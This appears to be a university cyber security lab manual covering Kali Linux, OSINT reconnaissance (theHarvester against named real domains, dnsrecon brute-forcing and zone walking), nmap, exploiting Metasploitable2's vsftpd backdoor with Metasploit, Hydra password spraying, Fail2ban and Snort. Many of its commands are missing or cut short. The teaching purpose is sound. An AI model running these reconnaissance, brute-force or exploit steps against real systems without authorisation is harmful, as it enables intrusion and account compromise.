Professional Documents
Culture Documents
Cyber Security
Cyber Security
AIM:
To learn and experience different ways of Install Kali Linux on Virtual box
Kali Linux
Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-based Linux
distribution aimed at advanced Penetration Testing and Security Auditing.
Virtual Box
Oracle VM VirtualBox (formerly Sun VirtualBox, Sun xVM VirtualBox and InnoTek
VirtualBox) is a type-2 hypervisor for x86 virtualization developed by Oracle
RESULT:
Thus the Procedure for Install Kali Linux on Virtual box was launched and tested
2
CCS340 - CYBER SECURITY LABV Semester AI&DS
Aim
To understand kali linux and bash scripting
Kali Linux is a popular Linux distribution designed for digital forensics, penetration testing,
and network security assessments.
Kali Linux is specifically built for security auditing and testing purposes.
It includes numerous pre-installed tools for vulnerability assessment, penetration testing, and
digital forensics.
The distribution focuses on providing a robust environment for security professionals to
assess and strengthen the security of systems and networks.
2. Penetration Testing:
Kali Linux offers a vast array of tools for penetration testing, including network scanning,
vulnerability assessment, wireless attacks, web application testing, and more.
3. Digital Forensics:
Kali Linux provides a rich set of tools and utilities for digital forensics and incident
response.
Tools like Autopsy, Foremost, Sleuth Kit, and Volatility help in analyzing and recovering
data from digital devices, investigating security incidents, and conducting forensic
3
CCS340 - CYBER SECURITY LABV Semester AI&DS
examinations.
Kali Linux is built on Debian and uses the APT (Advanced Package Tool) package manager,
making it easy to install and manage additional software packages.
Kali Linux has extensive documentation available on their official website, including
tutorials, guides, and a user forum.
The Kali Linux community is active and supportive, providing assistance and sharing
knowledge through forums, blogs, and social media channels.
Bash scripting
A bash script is a series of commands written in a file. These are read and executed by the
bash program. The program executes line by line.By naming conventions, bash scripts end
with a .sh
Scripts start with a bash bang.
Scripts are also identified with a shebang . Shebang is a combination of bash # and followed
the the bash shell path. This is the first line of the script. Shebang tells the shell to execute it
via bash shell. Shebang is simply an absolute path to the bash interpreter.
#! /bin/bash
The path of the bash program can vary. We will see later how to identify it.
Execution rights
4
CCS340 - CYBER SECURITY LABV Semester AI&DS
Scripts have execution rights for the user executing them.An execution right is represented
by x. In the example below, my user has the rwx (read, write, execute) rights for the file
test_script.sh
File colour
Executable scripts appear in a different colour from rest of the files and folders. In my
case, the scripts with execution rights appear as green.
touch hello_world.sh
which bash
In my case, the path is /usr/bin/bash and I will include this in the shebang.
5
CCS340 - CYBER SECURITY LABV Semester AI&DS
chmod modifies the existing rights of a file for a particular user. We are adding to user
Run the script.
You can run the script in the following ways:
./hello_world.sh
bash hello_world.sh
6
CCS340 - CYBER SECURITY LABV Semester AI&DS
Fractions are not correctly calculated using the above methods and truncated.
For decimal calculations, we can use bc command to get the output to a particular number of
decimal places. bc (Bash Calculator) is a command line calculator that supports calculation
up to a certain number of decimal points.
echo “scale=2;22/7” | bc
Where scale defines the number of decimal places required in the output.
RESULT:
Thus the Procedure for Explore Kali Linux and bash scripting was launched and tested
CCS340 - CYBER SECURITY LABV Semester AI&DS
Aim:
To Perform Open Source Intelligence Gathering Using Netcraft, Whois , Lookups,
DNS Reconnaissance, Harvester And Maltego.
On the site report page, scroll down to the "Hosting History" section. This section will
show the hosting provider and IP address of the website.
You can do the above steps by searching a single query on your web browser. Below you
CCS340 - CYBER SECURITY LABV Semester AI&DS
https://sitereport.netcraft.com/?url=[WEBSITE_URL]
As you can see on the above snapshot it is providing a list of subdomains associated with the
website, along with additional information about their IP addresses and web server
technologies.
CCS340 - CYBER SECURITY LABV Semester AI&DS
https://sitereport.netcraft.com/?url=[WEBSITE_URL]&tbl=server
For example, to search for the web server technology used by Tesla, the query string would
be:
https://sitereport.netcraft.com/?url=tesla.com&tbl=server
https://sitereport.netcraft.com/?url=[WEBSITE_URL]&tab=phishing
To check for phishing sites, bug hunters can use the following query string:
https://sitereport.netcraft.com/?url=tesla.com&tab=phishing
For example, to search for phishing sites associated with Tesla, the query string would be:
CCS340 - CYBER SECURITY LABV Semester AI&DS
Whois Lookup
Whois is a query and response protocol that’s used for querying databases that store the
registered users or assignees of an internet resource, like a domain name, an IP address block
or an autonomous system, etc.
About Whois
Whois is an Internet service and protocol that searches and displays information about a
domain name from repositories of domain name registrars worldwide.
Features.
Provides administrative information such as registrar and contact information for the
individual or organization that controls the domain.
essential resource for maintaining the integrity of the domain name registration and website
ownership process.
WHOIS Lookups
https://whois.domaintools.com/
https://www.name.com/whois-lookup
Some insights:
Whois Record
It is a record that contains all the basic information associated with the person, group, or
company that registers a particular domain name.
Provides name(s) and phone number(s), physical address and DNS servers, which can be
interrogated.
DNS reconnaissance
CCS340 - CYBER SECURITY LABV Semester AI&DS
Zone Transfer
The security problem with DNS zone transfer is that it can be used to decipher the topology
of a company’s network.Specifically when a user is trying to perform a zone transfer it sends
a DNS query to list all DNS information like name servers,host names,MX and CNAME
records,zone serial number,Time to Live records etc..
Reverse Lookup
According to Wikipedia reverse DNS lookup is the determination of a domain name with the
associated IP address.DNSRecon can perform a reverse lookup for PTR (Pointer) records
against IPv4 and IPv6 address ranges.To run reverse lookup enumeration the command
./dnsrecon.py -r <startIP-endIP>
must be used.Also reverse lookup can be performed against all ranges in SPF records with
the command ./dnsrecon.py -d <domain> -s.In the next image you can see the output that
produces a reverse lookup in a range of IP addresses.
Reverse Lookup
CCS340 - CYBER SECURITY LABV Semester AI&DS
Domain Brute-Force
For performing this technique all we have to do is to give a name list and it will try to
resolve the A,AAA and CNAME records against the domain by trying each entry one by
one.In order to run the Domain Name Brute-Force we need to type:
./dnsrecon.py -d <domain> -D <namelist> -t brt
Domain Brute-Force
As we can see we obtained A and CNAME records of the domain cnn.com and their IP
addresses.
Cache Snooping
DNS cache snooping is occurred when the DNS server has a specific DNS record cached.
./dnsrecon.py -t snoop -n Sever -D <Dict>
Zone Walking
This technique may unveils internal records if zone is not configured properly.The
information that can be obtained can help us to map network hosts by enumerating the
contents of a zone.In order to perform the zone walking we need to type the command:
./dnsrecon.py -d <host> -t zonewalk
theHarvester
What is theHarvester?
theHarvester is a commandline-based tool made by the team at Edge-Security. It is a
CCS340 - CYBER SECURITY LABV Semester AI&DS
dnsdumpster Duckduckgo
Active:
Installing
There are 4 different installation methods for theHarvester.
We can now proceed with installing the software by using the third option. As always,
it’s important to use some type of sandboxing environment when installing new software.
First, we should update our sandbox and install the software we will need:
Now we can make a Python virtual environment to install the necessary Python packages:
python3 -m venv
harvest cd harvest/
source bin/activate
git clone https://github.com/laramies/theHarvester
cd theHarvester/
pip install wheel
pip install -r requirements/base.txt
We found a minor bug during the installation and had to install the pip package 'wheel'
before installing the other packages from `base.txt'.
CCS340 - CYBER SECURITY LABV Semester AI&DS
1. Securitycode
Run the following:
python theHarvester.py -d rpfront.com -l 50 -b
Securitycode
There is a lot more data here. We found 3 related IPs and 2 hosts.
2. ThreatCrowd
We found no results when using ThreatCrowd as the source.
3. UrlScan
Running:
python theHarvester.py -d rpfront.com -l 50 -b
urlscan
Primary OSINT data sources are great for finding IPs and hosts. The good thing is that this
tool offers a big set of sources to choose from, we will now attempt to run more tests using
other third party services.
With the lack of results, it was a bit concerning that we might be doing something wrong. So
we decided to test out the Hunter API to see if we found any data regarding 'moslempress'
there. Unfortunately, we found nothing there either:
The 2 data sources corroborate what is the current IP address for
python theHarvester.py -d moslempress.com -l 10 -b
hunter
www[.]moslempress[.]com.
The number of data points here showcases the value of theHarvester.
python theHarvester.py -d moslempress.com -l 50 -b all -f
moslempress.html
CCS340 - CYBER SECURITY LABV Semester AI&DS
Maltego
Maltego is a software used for open-source intelligence and forensics, developed by Paterva
from Pretoria, South Africa. Maltego focuses on providing a library of transforms for
discovery of data from open sources, and visualizing that information
in a graph format”
You can always download maltego for Windows, Linux or Mac. Official site
2. Professionals
3. Enterprises
CCS340 - CYBER SECURITY LABV Semester AI&DS
The community version is free to use and others are paid with more features
Maltego uses graphs to show the data and information it collects. Now, let’s see how to how
to create a new graph.
Graphs in Maltego
To create a new graph.
To create a new graph you can go to application tab and click on new graph or you can also
select
new graph option from top left corner.
This is how a Graph in Maltego looks like. Once you have created a new graph you will get
a fresh page within a new tab, surrounded by a range of control windows.
Now just select the entity you want to perform OSINT on like some domain name or DNS
system.
People
CCS340 - CYBER SECURITY LABV Semester AI&DS
Basically, you can gather information about all the things mentioned above. Just select an
entity.
Here we have selected domain name. Now, just put any domain you want and click on the
entity.
This will expand all the available information on the domain and show it as a tree like
below-
Here you can see all the possible DNS records of the domain.
CCS340 - CYBER SECURITY LABV Semester AI&DS
Transform Hub
Now if you right-click after selecting an entity it will open up a context menu or transform
hub where you can search all sorts of things about the domain and fetch the available
information.
src-> maltego.com
This how a transform hub looks like and this is just a short part, It has a lot more options.
This is what you can find with just a domain with this amazing tool.
Result:
Perform open source intelligence gathering using Netcraft, Whois Lookups, DNS
Reconnaissance,Harvester and Maltego was tested and learned.
CCS340 - CYBER SECURITY LABV Semester AI&DS
CCS340 - CYBER SECURITY LABV Semester AI&DS
Ex.No: 4 Understand the nmap command d and scan a target using nmap
Date :
Aim
To read , understand and practise about the nmap command d and scan a target using nmap .
About Nmap
Nmap is a free and open source network exploration and security auditing tool that is widely
used for discovering hosts and services on a computer network.
The command nmap -h displays the help menu for Nmap. It provides a list of
available options and commands that can be used with the nmap command.
The nmap -d command is used to enable debug mode in Nmap. When this option is
used,
CCS340 - CYBER SECURITY LABV Semester AI&DS
In nmap, there is various scan available and one of the most basic and commonly used scans
is the version detection scan.
When you use the -sC option, Nmap runs a set of scripts that are deemed safe and
non-intrusive.
This command will perform a UDP scan of the target host at IP address 192.168.0.1. Nmap
will send UDP packets to each port on the target and analyze the responses to determine
which ports are open, closed, or filtered.
Aggressive scan
The -A option in Nmap enables aggressive scanning, which can provide more
information about the target host or network than a regular scan.
nmap -A scanme.nmap.org
In nmap, we can able scan more than one host and IP address also.
Parallelism:
Host Group:
If you want to scan multiple hosts at the same time you can use this Minimum and
Maximum host group attribute to make time-efficient
Host Timeout:
If want to scan the host for a particular period of time or time duration for a single port
Scan Delay:
Scan delay which helps us to pause or delay the packet send by the specific time Or it will
pause the nmap between each probe or request that you send
This great when your dealing with time-based-firewall, rate Limting, IDS There is options
which is --scan-delay/--max-scan-delay
In the below image you able be to notice that the First SYN Packet is arrived at
01:54:53
The Second SYN Packet arrived at 01:55:05 (Here you can confirm that packet has 12-
second delay)
Packet Rate:
Packet Rate we can able to specific that how many packets we want to send at once per
second
Minimum Rate:
Now it will send the three packets at same time not less than
CCS340 - CYBER SECURITY LABV Semester AI&DS
Result :
Thus the Understanding of the nmap command and scan a target using nmap was practised
CCS340 - CYBER SECURITY LABV Semester AI&DS
Ex.No: 5 Install metasploitable2 on the virtual box and search for unpatched
Date : vulnerabilities
Aim:
To learn and experience about to Install metasploitable2 on the virtual box and search for
unpatched vulnerabilities
Metasploitable 2
A test environment provides a secure place to perform penetration testing and security
research.
Downloading and Setting Up Metasploitable 2
The easiest way to get a target machine is to use Metasploitable 2, which is an
intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common
vulnerabilities.
Install metasploitable2 on the virtual box
After that extract that zip file and you will get the blue color VDI image file
Now you will get the virtual machine and operating system
Just name that machine as metasplotiable2 and change the type to Linux (Debian 64)
Now you will get the hardware section and set the base memory as 512 MB and processors
as 1
CCS340 - CYBER SECURITY LABV Semester AI&DS
Now you will get the virtual hard disk section Here you want to click the use an existing
virtual hard disk file
CCS340 - CYBER SECURITY LABV Semester AI&DS
Now click that add and add that VMDK file which metasploitable virtual disk image file and
Now you will get the metasploitable2 and the default username: msfadmin and password:
CCS340 - CYBER SECURITY LABV Semester AI&DS
msfadmin
Now the metasploitable2 is successfully installed
Now you will get the version and services details and in this I have found the FTP services
vulnerable to backdoor
CCS340 - CYBER SECURITY LABV Semester AI&DS
So finally we have installed that metasploitable2 and find the unpatched vulnerability
RESULT:
Thus the Procedure for Install metasploitable2 on the virtual box and search for unpatched
vulnerabilitieswas launched and tested
CCS340 - CYBER SECURITY LABV Semester AI&DS
Aim:
By using Metasploit to exploit an unpatched vulnerability inside the system
Procedure
Metasploit is a popular penetration testing tool that can be used to identify and exploit
vulnerabilities in computer systems and networks.
And fireup the metasploitable2 machine because we going to exploit that metasploitable 2
Now you will get the version and services details and using this details I have found the FTP
services vulnerable to backdoor
search vsftpd
Now you will get the exploit so just the use that exploit
CCS340 - CYBER SECURITY LABV Semester AI&DS
Here the RHOST ( Remote host Address ) and LPORT (Local Port Number)
exploit
Now you will successfully exploit that machine and you will get the meterpeter shell
Result:
Thus the learning about use Metasploit to exploit an unpatched vulnerability
was understand and practiced.
CCS340 - CYBER SECURITY LABV Semester AI&DS
Ex.No: 7 Install Linus server on the virtual box and install ssh
Date :
Aim :
To learn and Experience the installing of Linux server on virtual box and install SSH
Procedure
Create New VM
After that click on the “New” button to create a fresh Virtual machine.
If you have any plan to use the Virtual hard disk later in VMware then go for VMDK
otherwise let the default option VDI be selected.
Also, let the default “Dynamic Allocated” option be selected as it is. Allocate around 30GB
of virtual space.
CCS340 - CYBER SECURITY LABV Semester AI&DS
Now, we need to select the downloaded Ubuntu 22.04 ISO file as a Start-up disk to boot our
As you have done this, the same ISO image will show in the “ISO Image selection ” area.
Scroll to your added Ubuntu 22.04 LTS image and hit the Choose button.Finally, click on
the Start button.
After that again press the Enter key to let the system select the default Ubuntu Mirror to
fetch packages.
After that, if you want to access the server remotely using the SSH then you can select the
“Install OpenSSH Server” using arrow keys and spacebar otherwise simply select the
“DONE” and move forward because we can install it later.
CCS340 - CYBER SECURITY LABV Semester AI&DS
sudo -i
passwd
If you do not find the port 22 among open ports, open it in your firewall:
sudo ufw allow ssh
sudo ufw status verbose
You can also do it using the graphical interface of the UFW firewall.
Then go to Advanced -> Port Forwarding and add these settings: Name: ssh (or whatever
CCS340 - CYBER SECURITY LABV Semester AI&DS
you like)
Protocol: TCP
Host Port: 2222 (or any other port you like) Gust port: 22
Similarly, you can also set port forwarding for other interfaces.
Now, connect to the VirtualBox OS using the port 2222 that we set earlier and the
username of your VirtualBox OS:
You can find your VirtualBox IP address, if you run this command:
ip a
Result:
Thus the Procedure for Install Linus server on the virtual box and install ssh was
launched and tested .
CCS340 - CYBER SECURITY LABV Semester AI&DS
Ex.No: 8 Use Fail2ban to scan log files and ban Ips that show the
Date : malicious signs
Aim
To understand the usage of Use Fail2banto scan log files and ban Ips to show the
malicious signs
Procedure
Format of the Logfile
At the simplest logging level, entries will appear in /var/log/fail2ban.log as follows (fail2ban
version 1.0.2):
...
2023-02-17 23:44:17,037 [992]: [apache-auth] Ban
fail2ban.actions NOTICE XXX.9
1.244.228
2023-02-17 23:44:26,259 [992]: [apache-auth]
fail2ban.actions NOTICE Unban XX
X.122.233.27
2023-02-17 23:54:15,034 [992]: [apache-auth]
fail2ban.actions NOTICE Unban XX
X.91.244.228
2023-02-18 00:58:41,938 [992]: [apache-noscript]
fail2ban.actions NOTICE Ban X
XX.239.163.126
This is all very interesting, but what if you want to see a summary report so that you can try
to identify IP addresses that regularly trigger Fail2Ban - so that you can send a report to their
ISP or block them using a firewall script for example?
Grouping by IP address:
Note: the variable NF equals the number of fields in each row of the logfile. So $NF is the
value of the last field.
Sample output:
CCS340 - CYBER SECURITY LABV Semester AI&DS
...
4 XXX.124.81.130
5 XXX.248.175.246
8 XXX.29.45.142
Remember that each time an IP address gets banned it's because they've been caught at least
max failure times, so a total of 8 represents maybe 30 matches in the relevant logfile.
This is the best report for identifying problem subnets. The output will be the first two bytes
of the most 'caught' subnets:
...
75 83.110.
90 219.95.
154 210.213.
Let's take the last one on the list (highlighted) and see what it's been up to:
The output shows how many times those numbers appear in each logfile:
fail2ban.log:39
fail2ban.log.1.gz:129
fail2ban.log.2.gz:55
fail2ban.log.3.gz:78
fail2ban.log.4.gz:22
zcat -f /var/log/fail2ban.log* \
| awk '($(NF-1) == "Ban" && $NF ~ /^210\.213\./){print $NF}' \
| sort | uniq -c
CCS340 - CYBER SECURITY LABV Semester AI&DS
The output of this will be a list of the IP addresses starting with 210.213.
Grouping by IP address and Hostname:
The command for including hostnames in the list is a bit more complicated.
Note that the log resolve command can take some time to execute, especially if there are a
lot of IP addresses to be processed.
...
4 XXX.net.pk (XXX.83.169.221)
5 XXX.248.175.246 (XXX.248.175.246)
8 XXX.example.com.au (XXX.29.45.142)
You can of course just run host, dig, nslookup or logresolve manually on the addresses that
you want to identify.
This shows us which services each IP address has been trying to access/exploit:
...
4 XXX.124.81.130 [sendmail]
5 XXX.248.175.246 [sendmail]
8 XXX.29.45.142 [sendmail]
Now you know which logfiles to look in to see what they were doing to get banned.
The output will be the same as the second report above, but limited to just today's activity
rather than the whole logfile.
This can give you an idea of longer-term trends and the effectiveness of your firewall rules.
This method of examining all logfiles rather than just the current one can also be applied to
most of the reports above.
In the FTP example we've used the DROP policy instead of REJECT as that causes the
connection to hang for a longer time rather than giving an instant notification that they've
been rejected.
At some point (hopefully) the source computer will be 'fixed' or in any case stop abusing
your server. You should then remove the firewall rules.
[fail2ban-smtp]
enabled = true
port =
smtp
logpath =/var/log/fail2ban.log
maxretry = 3
findtime =
6h bantime =
1d
[Definition]
With these settings, fail2ban will monitor it's own logfile and if a HOST is banned three
times (maxretry) in six hours (findtime) they will incur a new ban lasting a full 24 hours
(bantime).
fail2ban-regex --print-all-matched/var/log/fail2ban.log/etc/fail2ban/filter.d/fail2ban
-smtp.conf
The first argument is the logfile to be scanned and the second argument the jail configuration
file containing failregex.
If nothing is being matched, or everything is being matched that may suggest a problem with
the regexp. Otherwise, if everything looks ok, you can start the new jail as described above.
Result:
Thus the development about how to Use Fail2ban to scan log files and ban Ips that show the
malicious signs was developed and learned .
CCS340 - CYBER SECURITY LABV Semester AI&DS
Aim
To learn how to Launch brute-force attacks on the Linux server using Hydra.
Procedure
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the
passwords of network services.
How to Install Hydra
Hydra comes pre-installed with Kali Linux and Parros OS. So if you are using one of them,
you can start working with Hydra right away.
How to Work with Hydra
Let’s look at how to work with Hydra. We will go through the common formats and options
that Hydra provides for brute-forcing usernames and passwords. .
$ hydra -h
This will give you the list of flags and options that you can use as a reference when working
with Hydra.
Let’s assume we have a user named “molly” with a password of “butterfly” hosted at
10.10.137.76. Here is how we can use Hydra to test the credentials for SSH:
root
admin
user
molly
steve
richard
Now we are going to test who has the password “butterfly”. Here is how we can run a
password spray attack using Hydra.
We will get a similar result to the following output if any of the users match with the given
password. You should also notice that we have used the flag -L instead of -l. -l is for a single
username and -L is for a list of usernames.
If this attack is successful, we will see a similar result to the other two commands.
Hydra will highlight the successful username/password combinations in green for all the
CCS340 - CYBER SECURITY LABV Semester AI&DS
matches.
We can also use the debug (-d) flag to gather even more information. Here is the same result
when using the debug flag:
Service specification
Instead of specifying the service separately, we can use it with the IP address. For example,
to brute force SSH, we can use the following command:
If Hydra’s session exits when an attack is in progress, we can resume the attack using the -R
flag instead of starting from scratch.
$ hydra -R
Targeted combinations
If we have a list of usernames and passwords, we can implement a dictionary attack. But if
we have more information on which usernames are likely to have a set of passwords, we can
prepare a custom list for Hydra.
username1:password1
username2:password2
username3:password3
We can then use the -C flag to tell Hydra to run these specific combinations instead of
looping through all the users and passwords.
Here is the syntax.
We have seen how to work with Hydra in detail. Now you should be ready to perform real-
world audits of network services like FTP, SSH, and Telnet.
CCS340 - CYBER SECURITY LABV Semester AI&DS
Result:
Thus the Procedure for Launching brute-force attacks on the Linux server using Hydra was
launched and tested .
Aim
To learn how to Perform real-time network traffic analysis and data pocket logging using
Snort
About Snort
Snort is a widely used open-source intrusion detection and prevention system (IDS/IPS). It is
capable of performing real-time network traffic analysis, detecting various types of network
attacks, and logging data packets for further analysis.
Start by installing Snort on a system of your choice. Snort is available for various operating
systems, including Linux, Windows, and macOS.
2. Rule Configuration:
Snort uses rules to detect and identify various types of network traffic and attacks.
Snort continuously monitors network traffic on the specified interfaces in real time.
4. Alert Generation:
Snort can generate alerts when suspicious or malicious network traffic is detected.
5. Packet Logging:
Snort can log data packets for further analysis and investigation.
Packet logging allows for in-depth analysis of network traffic, identifying attack vectors, and
understanding the nature of network-based threats.
The generated alerts and logged packets can be further analyzed using various tools and
techniques.
CCS340 - CYBER SECURITY LABV Semester AI&DS
Result:
Thus the real-time network traffic analysis and data pocket logging using Snort was done
with the snort IDS